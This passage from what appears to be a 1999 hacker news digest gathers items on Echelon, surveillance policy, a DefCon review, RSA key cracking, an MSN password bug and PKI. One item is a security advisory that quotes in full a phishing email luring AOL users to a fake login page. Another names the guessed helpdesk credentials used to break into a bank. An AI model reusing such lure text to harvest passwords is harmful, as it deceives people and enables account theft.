taken the cyberspace issues and are using it as justification for invading the home," James Dempsey, an attorney for the Center for Democracy and Technology, told the Post. Peter Swire, the White House's chief counselor for privacy, told the newspaper the administration supports encryption as a way to provide privacy for computer users. "But it has to be implemented in a way that's consistent with other values, such as law enforcement," Swire said. "In this whole issue we have to strike the right balance." The administration has for years been seeking a law to require computer makers to include a so-called Clipper Chip in their products that would give police a "back door" into computers despite any encryption software they may contain. In a backlash, more than 250 members of Congress have signed on as co-sponsors to legislation that would prohibit mandating such back-door devices on computers. Copyright 1999 The Associated Press. All rights reserved. 52.0 Hearings to be Held on Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The House Government Reform and Oversight Committee will hold hearings on such surveillance programs as the National Security Agency's "Project Echelon," the NSA's global eavesdropping network. Earlier this year committee Chairman Dan Burton (R-IN) amended the FY 2000 Foreign Intelligence Authorization Act to require the DoJ, the NSA, and the CIA to submit to Congress a report detailing the legal standards the agencies use when they eavesdrop on American citizens. US House of Representatives http://www.house.gov/barr/p_081699.html 53.0 AOL Password Scam Uncovered ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Webmaster The Shadow Knights Security Corp. has released an advisory that details a new scam that they have discovered that attempt to steal AOL users passwords. Basically an email is sent to the user which directs them to a fake AOL NetMail page where they are prompted to enter their username and password to read unread mail. The Shadow Knights Security Corp http://www.ShadowGovt.net/Texts/aolscam2.html Brief written by - - The Phantom x^\|/^x http://angelfire.com/oh3/preview/ ::mirror:: http://www.ShadowGovt.net/aolscam/ The above link is from a scam e-mail that has been sent to who knows how many AOL members. This time the setup is even more elaborate than the site our last advisory was about. Our last advisory is similar to this one however, we feel the need to reiterate our position. Why a scam works: This scam setup and procedure is similar to all most AOL password scams, however, someone spent time on this one. AOL users tend to not be familiar with the 'real' Internet. This is not saying AOL users (in general) are not as smart as other ISP users, however, AOL users do lead a sheltered internet existence. A built in browsers, their own chat rooms, their own 'Instant Messages', even your own AOL buddy list. AOL is a great ISP for those who are beginning net users and for those who wish to venture out, start leaving that AOL window and go out and find things on your own. Being this enclosed leaves AOL users to communicate only with other AOLers and less with the other ISP users. Research done previously by TSK Security Corp. suggest that 86% of AOL users who received this e-mail will visit the site; 62% of AOL users who received this e-mail will give their password and logon to the site The setup: AOL security breaches are more often then not, attempted using our good friend Social Engineering. I received the e-mail via BCC from MAIL36@aol.com. The scam includes a subject of 'AOL NetMail 2.0' and the body contains claims of: 'We have noticed that you have not been using America Online NetMail. You currently have: [5] unread message(s)' The body of message also includes details that 'Many times urgent messages are sent to NetMail, due to confidentiality, or privacy.' Upon visiting the page you see what looks like the AOL NetMail page however, on this page is an Angelfire banner. Note: Angelfire is not owned by AOL and you should never trust an internet site UNLESS it is on the relevant domain (AOL.com). Example: If you are told to visit the new Hacker News Network (hackernews.com) and the link sends you to an Angelfire or Tripod account DON'T BELIEVE THAT YOU ARE AT HackerNews.com . These scams will only continue if ignorance seems never to subdue. Please, if you are an AOL user (like myself) never, ever, EVER giveaway your account information to an unauthorized source. AOL Staff will NEVER ask for your password to your Logon account. Below is the exact text of the scam e-mail (A). I have checked out the supposed links above and they look to be from a free CGI Scripting Service. If you do receive this scam or similar scam e-mail, forward all the scam e-mails to TOSEMail1@aol.com . Webmaster@ShadowGovt.net - TSK Security Corporation - http://www.ShadowGovt.net KnightNews Network - http://www.HackerNews.net (A). "Dear Member AOL NetMail 2.0 We have noticed that you have not been using America Online NetMail. You currently have: [5] unread message(s) To check your E-Mail please goto: Netmail Preview (http://angelfire.com/oh3/preview/) Many times urgent messages are sent to NetMail, due to confidentiality, or privacy. For more information please Email AOLNetMail@AOL.Com Thank you Mike Bowers AOL NetMail 2.0 ©1999 America Online" @HWA 54.0 Bronc's Defcon VII Review ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Bronc Buster The Synthesis has finnally posted a review of Defcon VII, that was in their last print issue, onto their web site. The review is authored by someone you might know, Bronc Buster. The Synthesis http://www.thesynthesis.com/tech/defcon/vii.html DefCon 7 Hackerz, Phreakerz and Fedz: Three Days of Fear and Loathing in Las Vegas By Bronc Buster We flew into Las Vegas on Wednesday, hoping to get to check out the hotels and casinos on the strip before it all started. How were we to know the worst floods in Las Vegas history would happen, and that we would be told to stay in our hotel rooms for our own safety? What a beginning to a long five days, and another weird kick off for another installment of DefCon. This was DefCon 7, the annual hacker convention that happens every year in Las Vegas. Everyone comes to DefCon: Teams from Microsoft and Intel, Federal Agents, elite underground figures, a huge number of hackers and phreakers, and even high school kids who must have ran away to come, because they look far too young to be in the city of sin by themselves. They come from all over the world: from Australia, Kuwait, Europe, South America, you name it. So for those of you not familiar with DefCon, you are asking yourself what would bring all these people—well over 3000 by some estimates—to the Alexis Park Hotel for this three-day event. Well, ask each different person and you will get a different answer. DefCon had three different speaking tracks this year, ranging from newbie to advanced topics, like how to take over PBX phone systems, to a simple introduction to TCP/IP, which is the protocol the Internet uses to function the way it does. Now, on the surface it may sound like a normal convention just like any other, but once you get there, you notice some strange things happening. There were vendors selling everything from very real-looking fake IDs to books, old computer hardware and military computer equipment, T-shirts and CDs with alternate operating systems, like FreeBSD and Linux. There was a scavenger hunt, in which the items to be collected included everything from a satellite dish off the top of a famous casino, to a menu from a local restaurant. They had "hacker death matches" in huge, inflatable sumo outfits, that paired off people who may hate each other online, but have never seen each other in real life. Popular yearly games are played, like Hacker Jeopardy, in which teams of hackers get onstage in a game of Jeopardy to see who knows the most, with the losers having to drink large amounts of beer. The l0pht (pronounced Loft) also holds a TCP/IP drinking game, where people shoot it out on stage to see who knows the most about the complex inner-workings of the net, with the losers having to drink large amounts of beer. Another popular game that goes on throughout the entire convention is "Spot the Fed." This is where normal con goers try to pick out the feds who might be in the crowd mingling. It’s all in good fun, and if spotted, they are brought on stage, asked to show their ID, and then given a round of applause and T-shirt saying "I am a Fed." As the years roll by and DefCon gets larger and larger, it attracts more and more people. This was apparent in how serious the U.S. Government is taking it, this year hosting its own panel where people could ask questions to agents from the National Security Counsel, the White House and the NSA. More apparent were the masses of media people who showed up. More than 300 press passes were given out, and there were over 20 film crews on hand, from CNN to Z-Net, and TV stations from all over the world. Needless to say, it is almost unbelievable seeing it go from what it was 7 years ago—when it was a gathering of a few hundred people run by a group of friends who had the wild idea to get together to have to fun in Las Vegas—to what it is today. One of this year’s highlights included a presentation from a group called the Cult of the Dead Cow, or cDc for short, who released an updated version of their remote administration tool called Back Orifice 2000 (BO2K). In addition to its legitimate use—remotely administrating networks—critics say it can also take over other people’s computers over the Internet if someone were to be duped into installing it onto their system. BO2K has the ability to take over the mouse and keyboard of a victim’s computer, and in addition to logging everything a person might type, it can provide a video feed in real time, so one can watch what the victim’s computer is doing, what is being clicked on, and what is being seen. Similar to last year’s presentation (when the group announced their original Back Orifice tool), this year the cDc made a grand entrance with strobe lights, loud techno music and spinning cow skulls on the walls. It was standing room only for their almost two-hour presentation. Another highlight, and always a favorite, was Capture the Flag. Now, this is not the game you played when you were a kid, this is Capture the Flag, hacker-style. People set up target boxes and put them on a network in one of the convention rooms, while other people hook up their laptops and try to break into them to plant their group’s "flag." These boxes vary in types and operating systems, and they are not your run of the mill systems, either. The owners secure them and try to make it a difficult task for people to get on. This year, a group calling itself the "Ghetto Hacker" took first prize by getting onto the most boxes and defending them from other groups who were hard at work trying to follow them. As you can no doubt imagine, as much play as serious work goes on at this con, which is why people say that is it so popular. The parties go on long into the night, and the speakers do not start until noon or so, then fade into the games, which last until midnight or longer. The Alexis Park was kind enough to stock Jolt Cola for the con-goers to help keep them going, and the Dis.Org Crew (the DOC) brewed, and then gave away case after case of caffeinated beer to also help keep the parties going strong. Now, you may be getting the idea that DefCon is nothing more then a three-day long party, but that’s only part of it. The convention features speakers on a variety of topics: this year, there were federal agents talking about legal matters and what the government is planning on doing for the future of the Internet; lawyers talking about rights and how they relate to the Internet; people talking about various security problems with different systems and software; investigators talking about online forensics and intruder-detection systems; reporters talking about what it is like reporting on the hacking underground, and much, much more. In the past, DefCon was looked on as a freak show of sorts, where people with multiple body piercing and colored hair were the norm. Now, as it grows, it almost looks as if this year that was the exception rather then the rule. More women are showing up, as well as people from all ethnic backgrounds, and more people are in their late 20s now (like me), rather then the pale youngsters of past conventions. The only thing that has remained from the days of yore is the party attitude. As you can imagine, not everything goes according to plan when you get over 3000 people with a lot of technical skills and a lot of beer in one place. The lights and climate controls were messed with more than once, and the radio channels the hotel security used had to be changed several times as well because their channels were being taken over by short wave radios that many people were carrying on their belts. Other classic pranks were pulled as well: soap was poured into the hotel fountain, beer bottles were left floating in the pool, and streakers ran through the con from time to time (men and women). After the first day, the hotel had to double its security, but as with most hotels that have hosted DefCon in the past, it was not ready for what came with the con. On Saturday, some poor couple got married and had their reception at the Alexis Hotel; they were surrounded by freaky people con-goers and left shortly after their party arrived. The con’s organizer, Jeff Moss (who goes by the name Dark Tangent), was strangely absent this year for most of the con. In past years, Moss was almost omnipresent, constantly up on stage with announcements and fixing problems that arise during the three-day con. In his absence, a large fellow name Priest ran the con, and run it he did, with an iron hand. He was a cross between a Nazi SS trooper and a pro wrestler, throwing people out on a whim and canceling presentations by people he didn’t like. If there was anything that could have made a fun three days turn bad, he was it. Lucky for us con-goers, Moss would pop in from time to time and defuse things, which kept the con moving with only a few bumps. The whole idea behind DefCon is to make a place where people can meet their friends and enemies, people they may only know online; where people can learn and exchange ideas; where anyone can come and get a look inside the hacker underground and see that it’s not some dark, scary place some reporters make it out to be, but rather a preview of the movers and shakers of the next century. These people are not trying to take over the Internet, they are just trying to improve it and keep companies honest in their work and what they release. Who knows, maybe if we’d had a DefCon 20 years ago, we would not be facing the Y2K problem now, because after all, the Internet is going to be around for a long time, and these people who spend a large amount of their time online want nothing more than to see it improved. Bronc Buster is a California-based hacker whose exploits have been featured in the LA Times. @HWA 55.0 Y2K Survival Catalog ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by techs Worried about Y2K? Fear the end of the world as we know it? Afraid you might run out of breath mints? Wonder how your going to generate random numbers when the power fails? Get all of your Y2K survival needs here. Y2K Survival Catalog http://www.brunching.com/features/feature-y2kcatalog.html @HWA 56.0 BELGIAN BANK COMPROMISED ~~~~~~~~~~~~~~~~~~~~~~~~ From www.net-security.org by Thejian, Friday 20th August 1999 on 3:00 am CET DeCursor.com reports today that the hacker ReDaTtAcK, who only a few days ago hacked the Belgian ISP Skynet, yesterday successfully intruded the computersystems of the Generale Bank, the biggest bank in Belgium. Making use of the banks' remote banking program and by guessing the helpdesk accounts' login (helpdesk) and password (hlpdsk) he was able to bruteforce the user accounts on the system and in doing so he claims to have access to account info, transactions and login codes. The bank says it won't press charges and might even ask the hacker for his assistance in fixing the problems. @HWA 57.0 CARDING IN NEWCASTLE ~~~~~~~~~~~~~~~~~~~~ From www.net-security.org by Thejian, Friday 20th August 1999 on 1:00 am CET Thieves in Newcastle are using the Internet to buy goods, charging them to other people's credit cards. Detectives have established how the thieves operates but are unsure how they are obtaining details of other people's credit cards, a lot of the victims never used the Internet to buy anything, so there is no reason why their credit details are availble to third parties. Read the story Net theft is on the cards 19aug99 THIEVES in Newcastle are using the Internet to buy goods, charging them to other people's credit cards. The scam has been used to buy property including $500 worth of computer software and theatre tickets. Detectives have established how the thieves operates but are unsure how they are obtaining details of other people's credit cards. "We are puzzled how he is finding out details of these people's accounts," Detective Senior Constable Wayne Moulton said. "A lot of these victims have never used the Internet to buy anything so there is no reason why their credit details would be accessible." Police said card numbers and names had been checked before the goods were dispatched, but were found to be valid and were processed by retailers. Det Moulton said the goods were "sent to empty homes or places where the people are away @HWA 58.0 U.S.-British Cyber-Spy System Puts European Countries on Edge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Zombie Cow http://www.latimes.com:80/excite/990816/t000072952.html Monday, August 16, 1999 Digital Nation U.S.-British Cyber-Spy System Puts European Countries on Edge By GARY CHAPMAN OVERETO, Italy--It felt like there was a new Cold War developing at a conference here last week on computers, networks and international security, only this time the adversaries are the United States and Europe and the field of conflict is cyberspace. The revelation last year about the collaborative electronic eavesdropping system developed by the U.S. National Security Agency and British intelligence agencies, a system known as Echelon, has become a huge topic of discussion in Europe. The Echelon system can and does intercept "all e-mail, telephone and fax communications" in Europe, according to a report delivered last year to the European Parliament, and further investigations revealed that this capability also covers Australia, New Zealand and other countries. The report's author, Steve Wright, director of Omega Foundation, a British human rights group, was here last week and summarized his investigation into Echelon. "The Echelon system forms part of the U.K.-U.S.A. system but unlike many of the electronic spy systems developed during the Cold War, Echelon is designed for primarily nonmilitary targets: governments, organizations and businesses in virtually every country," states Wright's report, "An Appraisal of Technologies of Political Control," (available on the Web at http://cryptome.org/stoa-atpc.htm). The report was prepared for the European Parliament's Scientific and Technological Options Assessment (STOA) group. Its release in early 1998 shocked European government leaders. [snip..] ISN is sponsored by Security-Focus.COM @HWA 59.0 Watching the digital detectives. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.ft.com/hippocampus/q13c04e.htm Life / Technology SURVEILLANCE: Watching the digital detectives Software that analyses video tape has brought total surveillance a step closer, says Alan Stewart The recent film Enemy of the State contains a chilling account of what might happen when the security services turn on an innocent man, unwittingly involved in their affairs. The film centres on an attempt to introduce a new law allowing the US government access to the video footage from surveillance cameras in shopping malls, petrol stations and street corners. It soon becomes clear, however, that the security services are already using video from those sources. Now, in the real world, a new software technology that can analyse and index video is being introduced by Cable News Network (CNN) to help it keep its competitive edge. Of obvious interest to television news companies, this video-searching capability is also being used by security services on both sides of the Atlantic. "We take the incoming video signal, whether it's off a tape or satellite dish, and extract what we call 'metadata' or index data," says Paul Lego, chief executive of Virage, one of the suppliers of video search software (see accompanying story). "We like to say we watch, read, and listen to the video." By 'watching' it, the software examines the frames of the video as they are read in, and when the picture changes sufficiently, a time-stamped 'key-frame' is stored in a database as metadata. If the video contains text (either teletext or close-captioning), this is 'read' and also time-stamped. The search software also 'listens' to the video, using an International Business Machines speech-to-text system which identifies speakers from a library of voices. "We can also, to a large degree, understand what they're saying - at least, at the key-word level," explains Mr Lego. Transcription is not yet perfect, but an accuracy of between 30 per cent (outdoors) and 90 per cent (in a studio) is possible. Users can search the database of metadata via the internet, by keying in the name of a person and a topic. "You might get back five video clips," says Mr Lego. "You can click on any of those and the software will cue to the point where that subject is being talked about." Mr Lego believes there is a huge government market for video analysis software, with about a third of Virage's business already being for US government agencies such as the FBI, CIA, Nasa, National Security Agency, National Image Mapping Agency, and Joint Combat Camera Command. The US Army and Air Force both use software from Islip Media, a rival video analysis company whose other users include the Department of Energy's Lawrence Livermore National Laboratory, and the National Institute of Standards and Technology. "The government watches every TV station in the world, looking for key events," says Mr Lego, who likens it to a huge TV network for every channel in the world, with an added requirement to analyse and translate languages. "In addition, there's a lot of stuff they watch that isn't what you would call broadcast television," he adds. The UK counterparts of the US security agencies are also using the same software to enable transatlantic trading of data. For the past few months, meanwhile, CNN has been testing a new system using Virage video analysis software, and this is now going into live operation. Twenty four hours a day, seven days a week, CNN's 1,500 editors receive 32 newsfeeds, which used to be recorded on to video tapes. Now the feeds are recorded digitally, together with the associated script and news data, so editors have access to them from their desktop. Other US TV networks are already using video analysis systems (CBS with IBM's DB2 Digital Library, and NBC with Islip's MediaSite). European broadcasters including the BBC and Carlton in the UK and Spain's Telecinco and Network Espańa have expressed interest or are running pilot schemes. Beyond news analysis, other TV uses of the software are digitising and indexing archives, adapting news for the web, and tracking newscasts of rival TV networks (being piloted in the US by Fox News and TimeWarner). Mark Juliano, Islip's chief executive, says internet-based searchable television is now a technical reality, with real-time searchable TV around the corner. "This would allow any wired home or business user to search for topics of interest on all channels currently broadcasting, as well as in stored programming," he says. Outside the TV industry, investment banks such as Goldman Sachs, Merrill Lynch and Morgan Stanley are testing the software for monitoring any mention of specific companies on financial news networks. The Harvard Business School has digitised its study material, which students can search using video analysis. General Motors is using the software to simplify searching through several hundred hours of digitised focus group sessions. The internet has fundamentally changed the model of searchable video, according to John Zappa, Islip's vice-president of marketing. "Previously, video cataloging, search and retrieval tools were aimed at a select group of media companies," says Mr Zappa. "Now, any company can easily put their video content on the internet." The introduction of video analysis and indexing technology can certainly bring benefits for business and consumer. But new technologies can have their drawbacks too. The snooping scenario envisaged by Enemy of the State may simply be a little late in its arrival. Software that's got it taped Virage's VideoLogger software is able to index video automatically and simultaneously, to digitise multiple video formats, and output information to any video application or database. The latest version supports plug-in video analysis engines for real-time facial and optical character recognition. VideoLogger works with the company's AudioLogger real-time speech recognition and speaker identification software. US-based Virage recently demonstrated a consumer version of VideoLogger, which the company claims will unlock the content of streaming video files on the internet. International Business Machines has developed a News Archive system using its DB2 Digital Library database technology. The Digital Library is used by some of the world's largest media collections, such as the US Library of Congress, the Vatican Library in Rome, the State Hermitage Museum in St Petersburg, Russia, and the National Palace Museum in Taiwan. The News Archive system lets users search video clips via precoded parameters, such as clip date, subject name, producer, and location, or carry out free-text searches of text notes and scripts. IBM's "query by image content" allows a search for clips according to their shape and colour. A spin-off from Carnegie-Mellon University in Pittsburgh, Pennsylvania, Islip (Integrated Speech, Language, and Image Processed) Media has licensed the technology base and software of the university's Informedia Digital Library project. Islip's MediaSite system consists of several modules, including creation and search tools. Islip's MediaSite.net web site is a clearing-house for stock footage, news and information, training and education video content, which users can search and pay for via the web. Virage has recently launched a similar service, Virage Interactive, as a hosted index of searchable video. Excalibur Technologies' text searching software is used by many organisations, including the two leading political parties in the UK. The company, also US-based, has recently introduced its Excalibur Screening Room video analysis system, and has teamed up with StorageTek, the disc storage company, to provide large digital video repositories. @HWA 60.0 Microsoft acknowledges software glitch that exposes e-mail passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: William Knowles Microsoft acknowledges software glitch that exposes e-mail passwords WASHINGTON (August 19, 1999 10:00 p.m. EDT http://www.nandotimes.com) Microsoft Corp. said Thursday a bug in its new Internet chat software that permits coworkers and others to see a person's e-mail password. It promised to fix it by week's end. The glitch in the company's new "MSN Messenger" software means that others who have access to a person's computer could impersonate that person to read and even send e-mail using his "Hotmail" account without anyone's knowledge. Microsoft said that even if customers delete their saved password and enter it manually, it still becomes visible if another person types a specific sequence of keystrokes on that computer. Microsoft, whose software runs most of the world's personal computers, promised to fix the problem by the end of Friday. The company said it was made aware of the bug earlier this week. Deanna Sanford, the product manager for MSN, said the bug's ill effects were mitigated because a person must have physical access to the victim's computer, meaning the problem will be worse in offices where coworkers share machines than for home users. "In a shared office environment, if you trust the people you work with, this will probably never be an issue," Sanford said. But she said Microsoft recommends protecting each computer with a password. The problem was the latest embarrassment for Microsoft over its attempt to capture part of the burgeoning market for Internet chat software, currently dominated by America Online Inc.'s "Instant Messenger" software. When Microsoft unveiled its chat software earlier this month, AOL complained that Microsoft engineers had hacked into its proprietary network to let MSN customers communicate with AOL's customers. AOL successfully blocked Microsoft's software several times, but with each attempt Microsoft redesigned its chat software to bypass AOL's blocking attempts. MSN Messenger customers currently can chat with people using AOL's software, and Microsoft - in a bid for the moral high ground - announced earlier this week it will release its software protocols so that other companies can design software that interoperates with MSN. The latest Microsoft bug occurs when customers use the software to check their e-mail using Microsoft's popular Web-based "Hotmail" service. If a person stops the resulting Internet page from loading and looks at the underlying software code - which requires merely three clicks with the mouse - the user's e-mail name and password are displayed in plain view. Sanford said Microsoft will scramble the information in the upcoming patched version using encryption technology. ISN is sponsored by Security-Focus.COM @HWA 61.0 U.S to seek new computer surveillance power ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: William Knowles U.S. To Seek Neew Computer Surveillance Power http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html WASHINGTON (Reuters) [8.20.99] - The Justice Department is seeking new powers to break into private premises and disable security precautions on personal computers as a prelude to a wiretap or further search, the Washington Post reported Friday. The department wanted to make it easier for law enforcement authorities to get search warrants that would let them monitor suspects' computerized records after break-ins, said the paper, citing documents and interviews with Clinton administration officials. ``In a request set to go to Capitol Hill, Justice officials will ask lawmakers to authorize covert action in response to the growing use of software programs that encrypt, or scramble, computer files,'' the report said. Such encryption makes computers inaccessible to anyone who lacks a special code or ''key.'' Justice officials worry that such software ``is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime and the distribution of child pornography,'' the Post quoted an Aug. 4 memo by the department as saying. Under the proposed ``Cyberspace Electronic Security Act,'' investigators armed with a sealed warrant could comb computers for passwords and install devices that override encryption programs, the Post reported, citing the Justice memo. To pull information from a targeted computer, agents would still be required to get additional authorization from a court, the paper said. Justice officials were not immediately available for comment. The proposal is the latest in a years-long tug-of-war between the government and computer users who want to protect their privacy by encrypting documents. [snip..] ISN is sponsored by Security-Focus.COM @HWA 62.0 Code cracker worries cryptographers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.newspage.com/cgi-bin/NA.GetStory?story=h0812161.902\&date=19990813\&level1=46510\&level2=46515\&level3=821 Code Cracker Worries Cryptographers August 13, 1999 WORCESTER, MASS. - The Associated Press via NewsEdge Corporation : A developer of one of the most widespread computer encryption systems said Thursday he has designed a computer that could crack open a file encoded using the most common form of data encryption in only a few days. If built _ at an estimated cost of about $2 million _ such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today, according to cryptographers at the conference where the design was shown. Most highly sensitive military, banking and other data are protected by stronger encryption keys beyond its reach. The commonly used weaker keys, though, would become ``easy to break for large organizations,'' said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed both the new computer design and helped invent the widespread coding system _ known as RSA public-key encryption _ that it attacks. Shamir spoke at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute. Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key _ a sequence of 1s and 0s, or bits _ unlocks the secret coding of a computer transmission so it can be deciphered. Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever _ within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months. [snip..] ISN is sponsored by Security-Focus.COM @HWA 63.0 AntiOnline offers infosec website hosting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Straight from a message from Antionlines mailing list; AntiOnline is proud to announce its new "InfoSec Community". This community allows individuals with an interest in information security and technology to share their thoughts, information, and files with others who have similar interests. Here are some of the benefits of becoming and AntiOnline InfoSec Community Member: * Start out with 5 free megs, Get free upgrades up to 100 megs as your site grows. * Your address will be: http://www.AntiOnline.com/members/YOUR-NAME * Your site will be indexed by AntiSearch which draws thousands of people a day who are looking for information related to information security. * You can upload files you create on your computer directly to your site via a simple upload form. * Simple web-based editors help you create a page even if you're not an HTML wiz. * Each week AntiOnline will spotlight a community site on its main page. If chosen, this guarantees that your work will be seen by thousands of people in the information security industry! * A great place to distribute documents and programs that you've written! Also a great place to stick a resume! * Once your webpage is in place and attracting visitors, you can request a message board or guestbook to be hosted by AntiOnline.com for you, free of charge! Visit The Following URL To Sign Up For Your Own Account! http://www.AntiOnline.com/members/cgi-bin/new.cgi ------------------------------------------------------------------------------------ Get Your Free AntiOnline E-mail Account: http://www.AntiOnline.com/mail/ Keep An EYE On The Underground: http://www.AntiOnline.com/eye/ Learn To FIGHT-BACK against malicious hackers: http://www.AntiOnline.com/fight-back/ Search Security Sites: http://www.AntiSearch.com/ Exploits Sorted By OS: http://www.AntiCode.com/ ------------------------------------------------------------------------------------ @HWA 64.0 PKI yesterday today and tomorrow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PKI: Yesterday, Today, Tomorrow A Hurwitz Group Exclusive Analysis By Diana Kelley August 23, 1999 - For the past three years or so the rallying cry from the major PKI vendors has been, "This is the year of PKI!" While it's true that PKI has made some significant inroads into organizations, most notably ScotiaBank in Canada and the ANX PKI created by the US automobile industry, we are still some distance from the "Year of PKI." In practice many companies have spent time and effort prototyping PK-Islands, independent disconnected solutions that fail to support true business to business applications. Frustrated by investments in time and money with little visible return many organizations have temporarily halted PKI work. What's caused this slowdown in adoption and is there a change in the landscape that signals a new phase for PKI? What is it? PKI. It's a great buzzword, but what is it exactly? A large part of the confusion in the industry can be directly correlated to a muddied perception of what PKI is and what it can do for business. PKI is shorthand for Public Key Infrastucture. It is based on the concept of public key cryptography which uses a key pair, a public key and a private key, to perform various cryptographic functions. Public key cryptography differs from the more traditional symmetric key which uses the same keys for encryption and decryption. Symmetric key cryptography is fast and efficient but has a major drawback, it requires that the parties find a way to share the single key secretly in advance of the communication session. In a closed environment this is not a difficult accomplishment, but when two parties are meeting for the first time in a public digital environment such as the Internet it is almost impossible to arrange a convenient manner to exchange a secret key. By splitting up the cryptographic functions between a public and a private key, public key cryptography enables parties that have never met before to communicate in an encrypted manner. How the Keys are Used Security services provided by public keys include authentication and non-repudiation though the use of digital signatures, and confidentiality of communication in transit. The public and private keys are linked mathematically but one should not be capable of being derived from the other. If the private key could be derived from the public key it would break the security of the system. In practice, the public key is available to the public, it can be sent on request by the owner or stored in a central server. The private key should be kept secret by the owner, either on the holder's hard drive or a device such as a smartcard. Encrypted Communications Public key cryptography can be used to encrypt a communication before sending it over untrusted networks, such as the Internet. The sender encrypts the message using the recipient's public key. Depending on the distribution method the sender could request the public key directly from the intended recipient, or look up the public key in an available key repository. Upon receipt the recipient uses her private key to decrypt the data. Data that has been encrypted using a public key can only be decrypted using the related private key. This technique can be extended to data that is resides on hard drives as well to provide secure storage. Digital Signatures The other most common use of public key cryptogrpahy is to provide authentication and nonrepudiation using digital signatures. A signature is created by creating a hash of the data and then encrypting this with the sender's private key. The recipient performs the same hash function on the data to create a value. Using the sender's public key, the recipient decrypts the digital signature to discover the sender's hash value of the message. If the two values match, the recipient knows conclusively that the message has not been tampered with and that it was sent by someone in possession of the sender's private key. Components of PKI The PKI itself is the set of protocols and systems used to manage and distribute the keys and certificates. There is no single definition of what constitutes a PKI, although many organizations including the IETF (Internet Engineerng Task Force), The Open Group, and NIST (National Institute of Standards and Technology) are working on various PKI related standards. In general, most PKIs include a standard set of components as listed below. Registration Authority (RA) - The trusted entity that certifies the identity of the user Certification Authority (CA) - The trusted entity that issues public key certificates Certificate Repository - The server or system where public key certificates are held Certificates - The records that contain structured information about the owner including the owner's name, public key and the name of the issuing authority. The current standard for public key certifcates is X.509v3. Certificate Revocation Lists (CRLs) - The listing of revoked or suspended public key certificates. What Happened? After looking at public key cryptography a lot of companies thought, "Wow, this is really neat technology!" And they were right. But even the most sophisticated technology in the world is of no use unless it can be applied directly to the solution of a business/consumer problem. In the mad frenzy to become an Internet enabled e-Business many companies rushed towards implementation of PKI without first taking the time to define their business requirements. Without a clear business goal to build toward even the best technology in the world will fail to be successful. Business Need vs. Media Hype What, then are the business needs? Any organization that is planning to transform to an e-Business needs to answer the following questions: What is the business problem? What are the available technologies to solve the problem? What fits in best with our environment? Specific requirements vary depending on the line of business, unique needs of the business units, and market-based needs driven by industry. Within this spectrum, there are some basic e-Business needs that cut across most industries. These include: Availability to the global market for 24x7x365 selling and support Rapid deployment to keep pace with the competition Enhanced customer experience achieved using personalization technologies Increased control over the supply chain to reduce inventory turn time Privacy of communications Non-repudiability of transactions That's quite a long list and no single technology can provide answers to each one. Smart e-Businesses must select the most appropriate technologies to solve each problem. In the case of PKI, it is extemely well suited to provide solutions for the last two bullets, but does not directly provide an answer to the other e-Business issues. Reality Sets In When the media hype surrounding PKI broke hit the marketplace a few years ago there was a lot of misrepresentation and promise surrounding what PKI could actually do. The combination of a mixed media message and a lack of defined goals within business is one of the main reasons that many companies were disappointed with their early implementations of PKI technology. Creating a distributed, scalable PKI is not an easy task. This complexity has given rise to a number of factors that have contributed to failed or stalled PKI implementations. Lack of Interoperability If companies don't want to find themselves stranded on their own PK-Island they need to plan to integrate with other installations. This is easier said than done. X.509 certificates are not always interoperable and many of the PKI vendors can not provide cross-certification and certificate validation cross-vendor. Cost A lack of standards exists in pricing schemes as well. Some vendors charge per certificate, others per number of users, and others still by number of servers. The result is a confusing tangle, when it is finally sorted out most companies find that the cost of the PKI will be much higher than originally expected. Legacy Applications that aren't PK-enabled Public key technology is great but it needs to be linked directly into an application to add business value. Legacy systems and ERP applications are not enabled for PKI. Packaged application vendors are beginning to build in support for PKI, but until now the only way to integrate certificates into the back office has been through an investment in developer time and resources. Scalability Issues Because PKI is in its infancy there have not been a number of large distributed installations. Scalability of the CRLs (Certificate Revocation Lists) is a concern for organizations that will deal with large numbers of revoked certificates. Scalability and performance concerns include excessive time delays, high processing loads and need for additional bandwidth. Not Customer Centric Private keys are pieces of code that need to be stored someplace. One of the biggest benefits to e-Business is the ease of access and mobility. Using any available web browser people can check stock prices, read and write email, and bank on-line from a variety of locations and systems. If a certificate is required for access then user mobility is limited to the system where the certificate is stored. Smartcards are a possible solution to this dilemma but they are still too limiting; the free Internet terminal at the airport doesn't have a smartcard reader, does it? What Next? If PKI implementations have been so difficult to deploy successfully up to now, what has changed that makes it right for today's e-Business. One need look no further than ScotiaBank and the ANX PKI for answes. Both of these implementations were well thought out implementations of PKI to solve a specific business problem. The abilities to encrypt transactions between parties and provide non-repudiation services to consumers are cornerstones of e-Business. Already there have been some very successful uses for PKI in VPN implementations and for email. In the future as the transformation to the e-Business paradigm progresses, the boundaries between internal and external networks will disappear. In this newly open and interconnected world PKI has the opportunity to provide targeted business solutions in a number of areas. As communications between applications and devices increase, look for and 